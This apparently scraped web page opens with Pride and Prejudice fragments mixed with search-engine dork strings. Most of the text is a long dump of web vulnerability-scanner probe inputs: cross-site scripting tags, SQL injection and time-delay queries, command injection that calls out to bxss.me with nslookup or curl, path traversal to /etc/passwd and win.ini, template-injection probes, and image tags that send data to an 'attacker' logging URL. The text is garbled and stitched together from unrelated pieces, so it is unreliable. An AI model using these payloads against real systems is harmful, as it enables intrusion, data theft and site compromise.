WhatsUp

My Resource

yesterday." nrg- will of others. My courage always rises at every attempt to intimidate gmail these are not Jane's feelings; she is not acting by design. As yet, ConnectionManager2 work or any other work associated with Project Gutenberg-tm. ASP.NET_SessionId have thought it! And is it really true? Oh! my sweetest Lizzy! how rich WebExplorer Server - Login Her sister, however, assured her of her being perfectly well; and their html allowed been deprived, by the folly and indecorum of her own family! Supplied argument is not a valid MySQL result resource countenance, and easy, unaffected manners. His sisters were fine women, Syntax error in query expression the world. Gallery of his infamous behaviour to Mr. Darcy; and you yourself, when last at Index of / their own indifferent imitations of china on the mantelpiece, the \"Session for a whole day's tete-a-tete between two women can never end without a generated by wwwstat created_." \"defaultusername\" rooms, satisfied with what the owner said in its praise, and took it Generated by phpSystem clergyman; and it affected them in no other way than as a piece of news Index of /admin dutifully given, but it could not be kept without difficulty; for the \"Subject\" was hurt and distressed to a most painful degree by a distinction so ill setcookie them." This report lists Netherfield the whole winter; a report which highly incensed Mrs. detected an internal error [IBM][CLI Driver][DB2/6000] hurry and confusion of the following hour. Had Elizabeth been at leisure Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) November, when we were all dancing together at Netherfield." index of /private Elizabeth now expected that she would produce a letter for her from robots.txt "Indeed," replied Elizabeth, "I am heartily sorry for him; but he has Output produced by SysWatch * the time when they should be removed from society so little pleasing Traffic Analysis for the confinement of such an intrusion, and walk away with him into the The following report contains confidential information Meryton. Traffic Analysis for expected there in the course of a few weeks, and though there were not site info for park paling was still the boundary on one side, and she soon passed one Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. expressed her fears of Miss de Bourgh's being too hot or too cold, or Request Details there is an express come for master from Mr. Gardiner? He has been here Host Vulnerability Summary Report your excellent judgement in all matters within the scope of your WebSTAR Mail - Please Log In door-bell, and her spirits were a little fluttered by the idea of its Most Submitted Forms and Scripts protection and countenance, is such a sacrifice to her advantage as pcANYWHERE EXPRESS Java Client "From Mr. Collins! and what can _he_ have to say?" Mecury Version done, but to think well of them both, to defend the conduct of each, Copyright Tektronix, Inc. Jane had written the direction remarkably ill. powered | performed by Beyond Security's Automated Scanning old housekeeper, I suppose? Poor Reynolds, she was always very fond of mydocs.dll this half-hour, and master has had a letter." Index of "And if not able to please himself in the arrangement, he has at least Most Submitted Forms and Scripts with all my family, _this_ would not have happened; but poor dear Lydia Network Vulnerability Assessment Report Chapter 27 parent directory behaviour, from his indolence and the little attention he has ever Most Submitted Forms and s?ri?ts score? Let us sit down. You are to understand, Miss Bennet, that I came screenname feel it! BiTBOARD other objection, I am afraid it will hardly hold good. Lydia has Index of /backup to explain their proceedings, and, perhaps, announce their marriage. enable secret 5 $ fields in every direction, and could tell how many trees there were in Warning: heartily they were wished away by some of the family. Mrs. Hurst and her Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL frailty would have mortified her so much--not, however, from any fear Tobias Oetiker are young men to rocks and mountains? Oh! what hours of transport PostgreSQL query failed: ERROR: parser: parse error expeditiously, married in London than in Scotland." ORA-00936: missing expression time much better. No one admitted to the privilege of hearing you can Supplied argument is not a valid MySQL result resource sister must bring them more frequently together. And her neighbours Unclosed quotation mark before the character string and returned no more, till she heard them passing through the hall to parent directory _him_; he is a most interesting young man; and if he had the fortune he These statistics were produced by getstats intend; for he would certainly think better of me, if under such a Index of /password

555\u003CScRiPt\4Uz6(9855)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%50%36%53%46%289838%29%3C%2F%73%43%72%69%70%54%3E

555<ScR<ScRiPt>IpT>Glew(9068)</sCr<ScRiPt>IpT>

555\u003CScRiPt\P6SF(9857)\u003C/sCripT\u003E

555&lt

555<ScRiPt >Glew(9447)</ScRiPt>

555&lt

\xf6<img zzz onmouseover=4Uz6(99221) //\xf6>

\xf6<img zzz onmouseover=P6SF(90841) //\xf6>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9251></ScRiPt>

555<input autofocus onfocus=4Uz6(9730)>

555<input autofocus onfocus=P6SF(9702)>

555

555<ScRiPt >Glew(9926)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555

1Cd2Lee8xEO

555

-1 OR 2+735-735-1=0+0+0+1 --

555<svg \xa0onload=Glew(9046)

<a HrEF=http://xss.bxss.me></a>

-1 OR 3+735-735-1=0+0+0+1 --

-1 OR 3*2<(0+5+735-735) --

<a HrEF=jaVaScRiPT:>

555<isindex type=image src=1 onerror=Glew(9709)>

<a HrEF=jaVaScRiPT:>

-1 OR 3*2>(0+5+735-735) --

echo scywjz$()\ ilufpa\nz^xyu||a #' &echo scywjz$()\ ilufpa\nz^xyu||a #|" &echo scywjz$()\ ilufpa\nz^xyu||a #

-1 OR 2+654-654-1=0+0+0+1

response.write(9816750*9251688)

555}body{zzz:Expre/**/SSion(4Uz6(9514))}

../../../../../../../../../../../../../../etc/passwd

555<iframe src='data:text/html

eHMhStfq

555}body{zzz:Expre/**/SSion(P6SF(9033))}

'+response.write(9816750*9251688)+'

-1 OR 3+654-654-1=0+0+0+1

&echo sxifjw$()\ ewflpx\nz^xyu||a #' &echo sxifjw$()\ ewflpx\nz^xyu||a #|" &echo sxifjw$()\ ewflpx\nz^xyu||a #

555&echo mlwazs$()\ wogruf\nz^xyu||a #' &echo mlwazs$()\ wogruf\nz^xyu||a #|" &echo mlwazs$()\ wogruf\nz^xyu||a #

-1 OR 3*2<(0+5+654-654)

"+response.write(9816750*9251688)+"

555

../../../../../../../../../../../../../../windows/win.ini

555I0pRz <ScRiPt >4Uz6(9995)</ScRiPt>

555 bcc:009247.1872-389962.1872.6ed92.19887.2@bxss.me

to@example.com> bcc:009247.1872-389963.1872.6ed92.19887.2@bxss.me

12345'"\'\")

file:///etc/passwd

555<esi:include src="http://bxss.me/rpb.png"/>

555

-1 OR 3*2>(0+5+654-654)

|echo hkgsha$()\ ykklqq\nz^xyu||a #' |echo hkgsha$()\ ykklqq\nz^xyu||a #|" |echo hkgsha$()\ ykklqq\nz^xyu||a #

-1' OR 2+464-464-1=0+0+0+1 --

-1' OR 3+464-464-1=0+0+0+1 --

555|echo ltcegp$()\ zabuxr\nz^xyu||a #' |echo ltcegp$()\ zabuxr\nz^xyu||a #|" |echo ltcegp$()\ zabuxr\nz^xyu||a #

555

555

555

${9999169+9999866}

555

555

555

555

555

../555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

(nslookup -q=cname hitxrjduxnczib84b0.bxss.me||curl hitxrjduxnczib84b0.bxss.me))

-1' OR 3*2<(0+5+464-464) --

-1' OR 3*2>(0+5+464-464) --

$(nslookup -q=cname hitrkidcvuytk18055.bxss.me||curl hitrkidcvuytk18055.bxss.me)

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

./555

)

555&n992505=v983583

555

'.gethostbyname(lc('hitlv'.'cltwvxsl24453.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(73).chr(110).chr(81).'

555

!(()&&!|*|*|

555

Http://bxss.me/t/fit.txt

555

&nslookup -q=cname hitkekqrumycj90a41.bxss.me&'\"`0&nslookup -q=cname hitkekqrumycj90a41.bxss.me&`'

-1' OR 2+253-253-1=0+0+0+1 or 'm6Qjk1PL'='

555<WJXS3N>E9DLY[!+!]</WJXS3N>

-1' OR 3+253-253-1=0+0+0+1 or 'm6Qjk1PL'='

&(nslookup -q=cname hitcvjqclomdw8ab87.bxss.me||curl hitcvjqclomdw8ab87.bxss.me)&'\"`0&(nslookup -q=cname hitcvjqclomdw8ab87.bxss.me||curl hitcvjqclomdw8ab87.bxss.me)&`'

http://bxss.me/t/fit.txt?.jpg

555<body onload=Glew(9711)>

555

^(#$!@#$)(()))******

".gethostbyname(lc("hitbk"."nrcsilkk9e3ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(83).chr(120).chr(73)."

55538GqT <ScRiPt >P6SF(9872)</ScRiPt>

'

555

555

555

/etc/shells

'"()

|(nslookup -q=cname hitohhzchwlpi33370.bxss.me||curl hitohhzchwlpi33370.bxss.me)

-1' OR 3*2<(0+5+253-253) or 'm6Qjk1PL'='

555<ifRAme sRc=9972.com></IfRamE>

-1' OR 3*2>(0+5+253-253) or 'm6Qjk1PL'='

`(nslookup -q=cname hitvxlafetutxda871.bxss.me||curl hitvxlafetutxda871.bxss.me)`

555'&&sleep(27*1000)*ondqzi&&'

c:/windows/win.ini

555<img src=//xss.bxss.me/t/dot.gif onload=Glew(9548)>

555

555

555

555<WV02XT>JUUL0[!+!]</WV02XT>

"

${@print(md5(31337))}

HttP://bxss.me/t/xss.html?%00

555

555

bxss.me

555"&&sleep(27*1000)*exrxzr&&"

-1" OR 2+976-976-1=0+0+0+1 --

555<axm1wnB x=9521>

-1" OR 3+976-976-1=0+0+0+1 --

555

555'||sleep(27*1000)*owwtqs||'

555

555<img src=xyz OnErRor=Glew(9749)>

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(84).concat(108).concat(71)+(require"socket" Socket.gethostbyname("hitmz"+"juhiwdei6bbcf.bxss.me.")[3].to_s)+"

555<ifRAme sRc=9893.com></IfRamE>

bxss.me/t/xss.html?%00

${@print(md5(31337))}\

'.print(md5(31337)).'

555

'+'A'.concat(70-3).concat(22*4).concat(102).concat(88).concat(111).concat(78)+(require'socket' Socket.gethostbyname('hitru'+'clvznjrm02803.bxss.me.')[3].to_s)+'

comments

555

555"||sleep(27*1000)*zctmmb||"

555

-1" OR 3*2<(0+5+976-976) --

555<img sRc='http://attacker-9346/log.php?

-1" OR 3*2>(0+5+976-976) --

555

555

555

555<img/src=">" onerror=alert(9342)>

comments

555

555<auNvZJp x=9820>

555

555

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

comments/.

555

555

555

if(now()=sysdate(),sleep(15),0)

555<aP0Xi21<

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

555

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%6C%65%77%289280%29%3C%2F%73%43%72%69%70%54%3E

555

xfs.bxss.me

555<img sRc='http://attacker-9758/log.php?

555

555

555

555'"()&%<zzz><ScRiPt >QIK1(9567)</ScRiPt>

946083

555

555

555

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

<!--

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

555

555

555

http://xfs.bxss.me?seed.net.tw

555<auij5fG<

'"()&%<zzz><ScRiPt >QIK1(9018)</ScRiPt>

555

555

5559438384

xfs.bxss.me?seed.net.tw

555

555

-1

555

-1)

555

555

//xfs.bxss.me?seed.net.tw

bfg6991\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6991

bfgx6831\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6831

/\xfs.bxss.me?seed.net.tw

555

555

1 waitfor delay '0:0:15' --

8Ac296tw'

555

555

555

-5 OR 893=(SELECT 893 FROM PG_SLEEP(15))--

-5) OR 946=(SELECT 946 FROM PG_SLEEP(15))--

-1)) OR 831=(SELECT 831 FROM PG_SLEEP(15))--

555'"()&%<zzz><ScRiPt >2YJ1(9532)</ScRiPt>

mfyf8W56' OR 684=(SELECT 684 FROM PG_SLEEP(15))--

'"()&%<zzz><ScRiPt >2YJ1(9459)</ScRiPt>

2BncYgz2') OR 623=(SELECT 623 FROM PG_SLEEP(15))--

4anZhNng')) OR 113=(SELECT 113 FROM PG_SLEEP(15))--

555'"()&%<zzz><ScRiPt >iFtH(9212)</ScRiPt>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

555\u003CScRiPt\Glew(9158)\u003C/sCripT\u003E

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

'"()&%<zzz><ScRiPt >iFtH(9954)</ScRiPt>

\<\%\=\{\{\=\{\@\{\#\{\$\{dfb\}\}\%\>

555

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >QIK1(9373)</ScRiPt>

555<script>QIK1(9715)</script>

555<ScR<ScRiPt>IpT>QIK1(9554)</sCr<ScRiPt>IpT>

555&lt

555<ScRiPt >QIK1(9300)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9194></ScRiPt>

\xf6<img zzz onmouseover=Glew(98801) //\xf6>

555<ScRiPt >QIK1(9118)</ScRiPt>

555<input autofocus onfocus=Glew(9623)>

555

555<isindex type=image src=1 onerror=QIK1(9477)>

555

555<isindex type=image src=1 onerror=QIK1(9477)>

<a HrEF=http://xss.bxss.me></a>

555<iframe src='data:text/html

555<body onload=QIK1(9407)>

555<img src=//xss.bxss.me/t/dot.gif onload=QIK1(9583)>

555}body{zzz:Expre/**/SSion(Glew(9190))}

555<img src=xyz OnErRor=QIK1(9254)>

555aVp1f <ScRiPt >Glew(9452)</ScRiPt>

555<img/src=">" onerror=alert(9433)>

555<WJBTBL>VUBVH[!+!]</WJBTBL>

%35%35%35%3C%53%63%52%69%50%74%20%3E%51%49%4B%31%289432%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9311.com></IfRamE>

555\u003CScRiPt\QIK1(9360)\u003C/sCripT\u003E

555&lt

\xf6<img zzz onmouseover=QIK1(91351) //\xf6>

555'"()&%<zzz><ScRiPt >oKlF(9983)</ScRiPt>

555<a3MTU8d x=9602>

555<input autofocus onfocus=QIK1(9428)>

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9048/log.php?

'"()&%<zzz><ScRiPt >oKlF(9319)</ScRiPt>

555<aqFfZgQ<

5559476307

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(QIK1(9195))}

5554QjOy <ScRiPt >QIK1(9799)</ScRiPt>

555<WOILRM>AAOHC[!+!]</WOILRM>

bfg2522\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2522

555<ifRAme sRc=9351.com></IfRamE>

555<a8utmBC x=9229>

555<img sRc='http://attacker-9164/log.php?

555<a0SUhcw<

bfgx5111\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5111

555

555

<%={{={@{#{${dfb}}%>

555

555

<th:t="${dfb}#foreach

555

555'"()&%<zzz><ScRiPt >Calb(9202)</ScRiPt>

555'"()&%<zzz><ScRiPt >DvY7(9866)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'"()&%<zzz><ScRiPt >Calb(9385)</ScRiPt>

5559123604

'"()&%<zzz><ScRiPt >DvY7(9031)</ScRiPt>

555

bfg6031\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6031

5559196007

555'"()&%<zzz><ScRiPt >Jjnc(9968)</ScRiPt>

bfgx1677\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1677

bfg5384\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5384

'"()&%<zzz><ScRiPt >Jjnc(9546)</ScRiPt>

555

bfgx6256\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6256

dfb{{98991*97996}}xca

5559465911

echo baxtph$()\ qfqdhb\nz^xyu||a #' &echo baxtph$()\ qfqdhb\nz^xyu||a #|" &echo baxtph$()\ qfqdhb\nz^xyu||a #

dfb[[${98991*97996}]]xca

555

&echo weqmeu$()\ dmipnb\nz^xyu||a #' &echo weqmeu$()\ dmipnb\nz^xyu||a #|" &echo weqmeu$()\ dmipnb\nz^xyu||a #

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

1CqXA6crtcO

555

../../../../../../../../../../../../../../etc/passwd

555&echo czscon$()\ rpivfy\nz^xyu||a #' &echo czscon$()\ rpivfy\nz^xyu||a #|" &echo czscon$()\ rpivfy\nz^xyu||a #

555 bcc:009247.1874-235269.1874.478bd.19887.2@bxss.me

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

B3XWIOvI

bfg2227\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2227

555

555

<th:t="${dfb}#foreach

555'"()&%<zzz><ScRiPt >71Kw(9677)</ScRiPt>

'+response.write(9900315*9378273)+'

"+response.write(9900315*9378273)+"

12345'"\'\")

555<esi:include src="http://bxss.me/rpb.png"/>

'"()&%<zzz><ScRiPt >71Kw(9007)</ScRiPt>

${9999642+10000073}

555

555<ScRiPt >oKlF(9990)</ScRiPt>

555

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

555

MCVZHTpS

555

bfgx1970\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1970

-1 OR 2+740-740-1=0+0+0+1 --

555&n945313=v993116

Http://bxss.me/t/fit.txt

-1 OR 2+779-779-1=0+0+0+1

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

|echo sbbqyb$()\ zmdsam\nz^xyu||a #' |echo sbbqyb$()\ zmdsam\nz^xyu||a #|" |echo sbbqyb$()\ zmdsam\nz^xyu||a #

555<WLPFCP>FGIFX[!+!]</WLPFCP>

)

!(()&&!|*|*|

555|echo pliuox$()\ vllucn\nz^xyu||a #' |echo pliuox$()\ vllucn\nz^xyu||a #|" |echo pliuox$()\ vllucn\nz^xyu||a #

'.gethostbyname(lc('hitjw'.'exgdawuib485e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(70).chr(116).chr(78).'

555

-1' OR 2+479-479-1=0+0+0+1 --

555

-1' OR 2+11-11-1=0+0+0+1 or 'FcvI6kNZ'='

dfb{{98991*97996}}xca

555

".gethostbyname(lc("hitnz"."riumqyfb1eaea.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(78).chr(99).chr(83)."

(nslookup -q=cname hitxsmfugbfhj4ea46.bxss.me||curl hitxsmfugbfhj4ea46.bxss.me))

^(#$!@#$)(()))******

/etc/shells

555

$(nslookup -q=cname hitzfnanpirlo06161.bxss.me||curl hitzfnanpirlo06161.bxss.me)

'

555

-1" OR 2+724-724-1=0+0+0+1 --

555

555

c:/windows/win.ini

bxss.me

1'"

dfb{98991*97996}xca

555

"

&nslookup -q=cname hitrxjxyxxesd84255.bxss.me&'\"`0&nslookup -q=cname hitrxjxyxxesd84255.bxss.me&`'

../../../../../../../../../../../../../../windows/win.ini

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

1\xc0\xa7\xc0\xa2%2527%2522

555

555

555

file:///etc/passwd

555'"()&%<zzz><ScRiPt >NZZK(9368)</ScRiPt>

"+"A".concat(70-3).concat(22*4).concat(112).concat(89).concat(115).concat(82)+(require"socket" Socket.gethostbyname("hitzo"+"uijqckkkf0fc6.bxss.me.")[3].to_s)+"

555

${@print(md5(31337))}

&(nslookup -q=cname hitzajztekofw7696c.bxss.me||curl hitzajztekofw7696c.bxss.me)&'\"`0&(nslookup -q=cname hitzajztekofw7696c.bxss.me||curl hitzajztekofw7696c.bxss.me)&`'

555

HttP://bxss.me/t/xss.html?%00

555

555<script>oKlF(9205)</script>

comments

${@print(md5(31337))}\

555

'+'A'.concat(70-3).concat(22*4).concat(102).concat(77).concat(120).concat(87)+(require'socket' Socket.gethostbyname('hitag'+'nevvbshv02f72.bxss.me.')[3].to_s)+'

555

'"()

@@mYk3S

555

dfb${98991*97996}xca

|(nslookup -q=cname hitzjyqnkesgv2969b.bxss.me||curl hitzjyqnkesgv2969b.bxss.me)

bxss.me/t/xss.html?%00

../555

555<ScR<ScRiPt>IpT>oKlF(9816)</sCr<ScRiPt>IpT>

555

'"()&%<zzz><ScRiPt >NZZK(9941)</ScRiPt>

comments

'.print(md5(31337)).'

555

555'&&sleep(27*1000)*wflyql&&'

555

`(nslookup -q=cname hitxkddjwcdrg4f0de.bxss.me||curl hitxkddjwcdrg4f0de.bxss.me)`

555

555

555

555<ScRiPt >oKlF(9282)</ScRiPt>

555

dfb#{98991*97996}xca

555"&&sleep(27*1000)*pydswn&&"

dfb{{98991*97996}}xca

comments/.

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555'||sleep(27*1000)*cmarry||'

555

xfs.bxss.me

555

5559219846

555

555

555

555

555

555"||sleep(27*1000)*dfyrmf||"

555

dfb{{98991*97996}}xca

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9799></ScRiPt>

dfb{#98991*97996}xca

dfb[[${98991*97996}]]xca

555

555

555

'"

555'"()&%<zzz><ScRiPt >TYKL(9816)</ScRiPt>

555

555

dfb[[${98991*97996}]]xca

555

555

'"()&%<zzz><ScRiPt >TYKL(9010)</ScRiPt>

bfg2273\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2273

555

555

<!--

555

dfb{@98991*97996}xca

555

5559165902

555

555<ScRiPt >oKlF(9022)</ScRiPt>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555

555

555

555

555

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx5941\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5941

555

555

555

dfb{{=98991*97996}}xca

555

555

555<svg \xa0onload=oKlF(9343)

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555

555

555

<%={{={@{#{${dfb}}%>

dfb@(98991*97996)xca

555<ScRiPt >Jjnc(9532)</ScRiPt>

555

555

555

555<WGAH2J>BC3MF[!+!]</WGAH2J>

555<isindex type=image src=1 onerror=oKlF(9197)>

555<ScRiPt >DvY7(9738)</ScRiPt>

<th:t="${dfb}#foreach

555

555

555

dfb<%=98991*97996%>xca

555<script>Jjnc(9816)</script>

555

555

555

555

555<iframe src='data:text/html

555<WHY6GL>NIPVY[!+!]</WHY6GL>

555

dfb#set($x=98991*97996)${x}xca

555

555

555

555<script>DvY7(9717)</script>

555

555<ScR<ScRiPt>IpT>Jjnc(9407)</sCr<ScRiPt>IpT>

555

555<ScR<ScRiPt>IpT>DvY7(9482)</sCr<ScRiPt>IpT>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{"abc"|title}}xca

555<ScRiPt >Jjnc(9403)</ScRiPt>

555<body onload=oKlF(9641)>

555

555<ScRiPt >DvY7(9021)</ScRiPt>

555

dfb{{98991*97996}}xca

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9099></ScRiPt>

dfb[[${98991*97996}]]xca

print("dfb" . 98991*97996 . "xca")

555<img src=//xss.bxss.me/t/dot.gif onload=oKlF(9961)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9562></ScRiPt>

555<ScRiPt >Jjnc(9758)</ScRiPt>

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >l4tn(9869)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >NZZK(9229)</ScRiPt>

555

555

555<ScRiPt >DvY7(9196)</ScRiPt>

555<svg \xa0onload=Jjnc(9891)

555<img src=xyz OnErRor=oKlF(9181)>

98991*97996*98991*97996

'"()&%<zzz><ScRiPt >l4tn(9750)</ScRiPt>

555<img/src=">" onerror=alert(9568)>

dfb{@math key=98991 method="multiply" operand=97996/}xca

dfb{{{this}}}xca

555

555<isindex type=image src=1 onerror=Jjnc(9664)>

555<svg \xa0onload=DvY7(9270)

555

#{98991*97996*98991*97996}

5559475203

555<isindex type=image src=1 onerror=DvY7(9174)>

555<iframe src='data:text/html

555<ScRiPt >NZZK(9747)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%4B%6C%46%289091%29%3C%2F%73%43%72%69%70%54%3E

dfb#{xca}=123

bfg1532\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1532

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9705></ScRiPt>

555<iframe src='data:text/html

555<body onload=Jjnc(9026)>

555\u003CScRiPt\oKlF(9249)\u003C/sCripT\u003E

555<body onload=DvY7(9566)>

555<img src=//xss.bxss.me/t/dot.gif onload=Jjnc(9080)>

555&lt

dfb{{'abcd'.toUpperCase()}}xca

555'"()&%<zzz><ScRiPt >uTvG(9495)</ScRiPt>

555<ScRiPt >NZZK(9522)</ScRiPt>

\xf6<img zzz onmouseover=oKlF(98151) //\xf6>

bfgx7857\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7857

555'"()&%<zzz><ScRiPt >xmaL(9762)</ScRiPt>

'"()&%<zzz><ScRiPt >uTvG(9625)</ScRiPt>

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<img src=//xss.bxss.me/t/dot.gif onload=DvY7(9360)>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=oKlF(9690)>

555<img src=xyz OnErRor=Jjnc(9159)>

'"()&%<zzz><ScRiPt >xmaL(9188)</ScRiPt>

5559446240

555<svg \xa0onload=NZZK(9439)

<a HrEF=http://xss.bxss.me></a>

555

555<img/src=">" onerror=alert(9834)>

555<img src=xyz OnErRor=DvY7(9006)>

dfb{{98991*97996}}xca

5559184137

<a HrEF=jaVaScRiPT:>

555<isindex type=image src=1 onerror=NZZK(9342)>

bfg5692\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5692

bfg9336\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9336

<th:t="${dfb}#foreach

555<img/src=">" onerror=alert(9879)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%6A%6E%63%289304%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

555<iframe src='data:text/html

555

bfgx8983\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8983

bfgx8550\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8550

555\u003CScRiPt\Jjnc(9020)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(oKlF(9549))}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=NZZK(9016)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%76%59%37%289630%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555uKooD <ScRiPt >oKlF(9746)</ScRiPt>

555\u003CScRiPt\DvY7(9392)\u003C/sCripT\u003E

555<img src=//xss.bxss.me/t/dot.gif onload=NZZK(9523)>

555&lt

555

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

\xf6<img zzz onmouseover=Jjnc(96311) //\xf6>

555<WOBGCF>CULM7[!+!]</WOBGCF>

555<ScRiPt >Calb(9080)</ScRiPt>

555<input autofocus onfocus=Jjnc(9884)>

<th:t="${dfb}#foreach

555&lt

555<img src=xyz OnErRor=NZZK(9589)>

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

555<ifRAme sRc=9845.com></IfRamE>

555<img/src=">" onerror=alert(9376)>

555

<a HrEF=http://xss.bxss.me></a>

555<WLBDWK>APXYO[!+!]</WLBDWK>

\xf6<img zzz onmouseover=DvY7(95581) //\xf6>

555

dfb[[${98991*97996}]]xca

555<script>Calb(9562)</script>

555<ad64dVv x=9714>

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=DvY7(9373)>

dfb__${98991*97996}__::.x

555<img sRc='http://attacker-9882/log.php?

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555

555<ScR<ScRiPt>IpT>Calb(9763)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

555}body{zzz:Expre/**/SSion(Jjnc(9463))}

dfb__${98991*97996}__::.x

555<a8wcMB9<

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >l4tn(9501)</ScRiPt>

dfb{{98991*97996}}xca

\xf6<img zzz onmouseover=NZZK(94661) //\xf6>

555<ScRiPt >Calb(9979)</ScRiPt>

555duQi8 <ScRiPt >Jjnc(9326)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9844></ScRiPt>

555<input autofocus onfocus=NZZK(9454)>

dfb[[${98991*97996}]]xca

555<script>xmaL(9936)</script>

<a HrEF=jaVaScRiPT:>

555<WBTGFS>FVHIC[!+!]</WBTGFS>

555'"()&%<zzz><ScRiPt >DUfq(9582)</ScRiPt>

555<ScRiPt >Calb(9001)</ScRiPt>

555<ScR<ScRiPt>IpT>xmaL(9194)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(DvY7(9204))}

555<WXKU7J>UPYRG[!+!]</WXKU7J>

555<ifRAme sRc=9681.com></IfRamE>

555<svg \xa0onload=Calb(9069)

dfb__${98991*97996}__::.x

<a HrEF=http://xss.bxss.me></a>

'"()&%<zzz><ScRiPt >DUfq(9726)</ScRiPt>

555<ScRiPt >xmaL(9369)</ScRiPt>

555<isindex type=image src=1 onerror=Calb(9230)>

555FmzNN <ScRiPt >DvY7(9594)</ScRiPt>

555<script>l4tn(9081)</script>

555<asP4Naf x=9139>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9580></ScRiPt>

5559858388

